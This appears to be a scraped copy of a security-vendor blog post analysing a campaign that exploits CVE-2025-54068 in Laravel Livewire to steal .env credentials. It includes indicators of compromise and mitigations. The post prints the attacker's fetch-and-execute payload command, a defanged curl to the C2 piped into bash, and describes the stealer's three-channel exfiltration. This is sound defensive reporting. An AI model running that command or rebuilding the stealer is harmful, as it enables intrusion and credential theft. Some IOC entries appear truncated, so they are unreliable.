{“lastseen”:”2026-06-23T19:36:51″,”description”:”## **Introduction**\\n\\nOn May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable deserialization attack traffic turned out to be part of a large-scale credential theft operation exploiting CVE-2025-54068, a critical unauthenticated RCE vulnerability in Laravel Livewire v3 (versions up to v3.6.3).\\n\\nThe campaign, first documented here, has been running for several months, as evidenced by the large volume of stolen data. Recovery and analysis of the attacker’s exfiltration infrastructure revealed credentials harvested from 6,167 distinct applications spanning dozens of countries and sectors, from e-commerce and healthcare to financial services, education, and government. The attacker’s FTP server contained 1,851+ database dumps and 18+ email lists with over 26 million addresses, indicating the stolen credentials were being actively exploited. Attribution indicators throughout the malware and associated infrastructure point to an Indonesian-origin threat actor.\\n\\n## **Attack Vectors and TTPs**\\n\\n### **Initial Access: CVE-2025-54068 Exploitation**\\n\\nCVE-2025-54068 is a critical vulnerability in Laravel Livewire v3 caused by improper validation of component property updates during the framework’s hydration process. When a Livewire component state is restored from a browser request, Livewire v3 (up to v3.6.3) fails to verify the integrity of the submitted data before deserializing it. An unauthenticated attacker can inject a malicious serialized PHP object into this request, triggering arbitrary code execution on deserialization.\\n\\nThe following HTTP request, reconstructed from our captured attack traffic, illustrates the exploitation:\\n\\nFor full technical details on this vulnerability, please see the disclosure here.\\n\\n### **Payload Analysis**\\n\\nThe exploitation requests we captured contained serialized PHP objects constructed using PHPGGC gadget chains. These chains abuse legitimate PHP classes already present in Laravel applications to achieve code execution during deserialization. The attacker’s payload executes the following command:\\n \\n \\n **curl -skfsSL hxxps:\/\/xantibot[.]pw\/database-sell\/shoc.enz | tr -d ‘\\\\r’ | bash \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026**\\n\\nThis fetches a shell script from the attacker’s C2 server and pipes it directly into bash, executing it in the background with all output suppressed.\\n\\n## **Malware Analysis**\\n\\nThe credential stealer deployed in this campaign is a 5,269-byte Bash shell script named shoc.enz (**SHA256: 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e**). At the time of our analysis, this sample was not present in VirusTotal.\\n\\n### **Execution Flow**\\n\\nThe malware follows an eight-stage execution process:\\n\\n 1. **Environment Setup** : Creates a temporary working directory at \/tmp\/xxxxx\\n 2. **Process Check** : Verifies no existing shoc.sh processes are running to prevent multiple instances\\n 3. **File Discovery** : Recursively scans the entire filesystem for .env files using the find command\\n 4. **Credential Extraction** : Parses discovered files for DB_HOST, DB_DATABASE, DB_USERNAME, DB_PASSWORD, and APP_KEY values\\n 5. **Data Collection** : Copies matching files to a staging directory with randomized filenames\\n 6. **Compression** : Archives collected files using zip or tar.gz\\n 7. **Exfiltration** : Uploads archives to three separate C2 channels\\n 8. **Cleanup** : Deletes the local staging directory to remove forensic evidence\\n\\n\\n\\n### **Exfiltration Infrastructure**\\n\\nThe threat actor operates a redundant three-channel exfiltration system:\\n\\n**Channel** | **Endpoint** | **Purpose** \\n—|—|— \\nPrimary | FTP @ 47.129.100.149:21 | Main credential storage \\nSecondary | api.telegram.org | Notifications and small file uploads \\nTertiary | upload.gofile.io | Backup cloud storage \\n \\nOur investigation confirmed active access to all three channels. The FTP server contained 7 directories of stolen data, including full database dumps such as FULL_DUMP_[REDACTED_IP]\\u003e_2026-04-29_0418.sql.gz. The GoFile account showed owner-level access with 11,179 files totalling 309.9 MB.\\n\\n### **Attribution Indicators**\\n\\nMultiple indicators point to an Indonesian-origin threat actor: Indonesian-language comments in the malware source code, a timezone reference to Asia\/Jakarta, and the Telegram handle @ashtarotz (\\”\u9ed0\u7dda\u4f6c Wong Gen Deng\\”) linked to xantibot[.]pw, a domain that presents publicly as a legitimate anti-bot service while hosting the malware payload. Analysis of the domain, and telegram channel metadata also point to Indonesian origin.\\n\\nThe GoFile exfiltration account was registered to azrilsyahputra1337@gmail[.]com. Cross-referencing this address against public breach data reveals it appears in three separate historical breaches of BreachForums (November 2022, August 2025, and March 2026), placing the operator within underground breach communities over an extended period.\\n\\n## **What Was Stolen: Analysis of the Recovered Data**\\n\\nLaravel applications store all sensitive configuration in a single .env file: database credentials, API keys, payment processor secrets, cloud access keys, and encryption keys. This makes the file an exceptionally high-value target. A single .env file can provide everything needed to access the application’s database, impersonate users, process payments, and access cloud infrastructure.\\n\\nAnalysis of the recovered collection revealed credentials from 6,167 distinct applications. Of 21,916 unique files analysed, 29% declared a production environment, though the true proportion is higher as many files labeled local contained live payment keys and real domain URLs.\\n\\nThe breakdown of exposed credentials:\\n\\n**Credential Type** | **Count** \\n—|— \\nDatabase passwords (real, non-default) | 14,566 (66.5%) \\nProduction applications with DB credentials | 5,784 \\nConfirmed live Stripe secret keys (sk_live_) | 188 \\nValid AWS IAM credentials (AKIA format) | 381 \\nJWT secrets | 2,929 \\nGoogle OAuth client secrets (GOCSPX-) | 2,409 \\nFilament admin panel passwords | 2,232 \\nSMTP passwords | 7,176 (32.7%) \\n \\n \\n\\nThe FTP server contained over 1,850 full database dump files, confirming the stolen credentials were actively used to extract database contents.\\n\\n## **Targeting**\\n\\nThe campaign scanned for vulnerable Laravel installations indiscriminately, with victims spanning online gambling and betting (400+ platforms, predominantly Brazilian and Southeast Asian operators), e-commerce, healthcare, education, logistics, and financial services. Multiple confirmed .gov domains were present in the dataset, showing the scanner made no distinction between commercial and public-sector targets. Recognizable open-source Laravel applications were present in the dataset, including the invoicing platform Invoice Ninja, accounting software Akaunting, event ticketing platform Attendize, photo gallery Lychee, and restaurant management system TastyIgniter. Applications were registered across .com, .ru, .site, .online, .br, .tr, .id, .ke, and dozens of other TLDs. Any organization running unpatched Laravel Livewire v3 was a potential victim.\\n\\n## **Conclusion and Recommendations**\\n\\nThis campaign illustrates how straightforward credential theft, when combined with a high-impact vulnerability and automated scanning, can scale to thousands of victims in a short window. Recovery of the exfiltration infrastructure revealed credentials from over 6,000 distinct applications, including 188 live Stripe payment keys, 381 valid AWS IAM credentials, and database passwords for nearly 5,800 confirmed production systems. For many victims, the initial server compromise is only the beginning of the exposure.\\n\\nWe recommend the following actions for defenders:\\n\\n 1. **Patch immediately** : Update Laravel Livewire to version 3.6.4 or later to remediate CVE-2025-54068. This is the single most effective mitigation.\\n 2. **Block outbound FTP** : Production web servers should not require outbound FTP access. Block port 21 egress and alert on any connection attempts to 47.129.100.149.\\n 3. **Monitor for suspicious API access** : Alert on connections from web servers to api.telegram.org and upload.gofile.io, which are atypical for production Laravel applications.\\n\\n\\n\\nIf you believe your organization has been compromised, rotate all database credentials and Laravel APP_KEY values immediately, and review database access logs for unauthorized activity.\\n\\n## **Indicators of Compromise**\\n\\n### **IP Addresses**\\n\\n * 86.88.234 (Attack source)\\n * 129.100.149 (FTP C2 server)\\n * 63.67.153 (Webhook server)\\n\\n\\n\\n### **Domains and URLs**\\n\\n * pw\\n * hxxps:\/\/xantibot[.]pw\/database-sell\/shoc.enz\\n * hxxps:\/\/webhook[.]site\/b156c0b1-3e2f-41b4-a9a3-f492e50a0595\\n\\n\\n\\n### **File Hashes (SHA-256)**\\n\\n * 548c3672fd3201dab56f714fdd5812bb024980815b3a2b6299f0126bdf16fb3e (shoc.enz)\\n\\n\\n\\n### **MITRE ATT \\u0026CK Mapping**\\n\\n**Technique ID** | **Technique Name** | **Campaign Usage** \\n—|—|— \\nT1190 | Exploit Public-Facing Application | CVE-2025-54068 exploitation \\nT1059.004 | Unix Shell | Bash script execution via piped curl \\nT1105 | Ingress Tool Transfer | curl retrieval of shoc.enz payload \\nT1083 | File and Directory Discovery | Recursive filesystem scan for .env files \\nT1552.001 | Credentials In Files | .env file harvesting \\nT1560.001 | Archive Collected Data: Archive via Utility | zip\/tar.gz staging archive creation \\nT1041 | Exfiltration Over C2 Channel | Telegram Bot API exfiltration \\nT1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | FTP exfiltration to 47.129.100.149 \\nT1567.002 | Exfiltration to Cloud Storage | GoFile uploads \\nT1070.004 | File Deletion | Staging directory cleanup post-exfiltration \\nT1036 | Masquerading | Randomized archive and staging folder names \\n \\n \\n\\n_Imperva Threat Research continues to monitor this campaign. Imperva customers are fully protected against exploitation of CVE-2025-54068. Customers requiring further guidance on this vulnerability are encouraged to contact Imperva support._\\n\\nThe post CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised appeared first on Blog.”,”published”:”2026-06-23T18:01:17″,”modified”:”2026-06-23T18:01:17″,”type”:”impervablog”,”title”:”CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised”,”source”:””,”references”:””,”id”:”IMPERVABLOG:CC22F53AF67610E01435FC711BB2B03F”,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[“CVE-2025-54068″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.imperva.com\/blog\/cve-2025-54068-laravel-livewire-credential-theft-campaign-6000-applications-compromised\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-23T19:36:51″,”description”:”## **Introduction**\\n\\nOn May 24, 2026, Imperva observed exploitation attempts against Laravel Livewire applications, blocked by the Imperva Cloud WAF. What initially appeared to be unremarkable…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[9,6,8,35,12,59,13,7,11,5],"class_list":["post-65230","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-impervablog","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n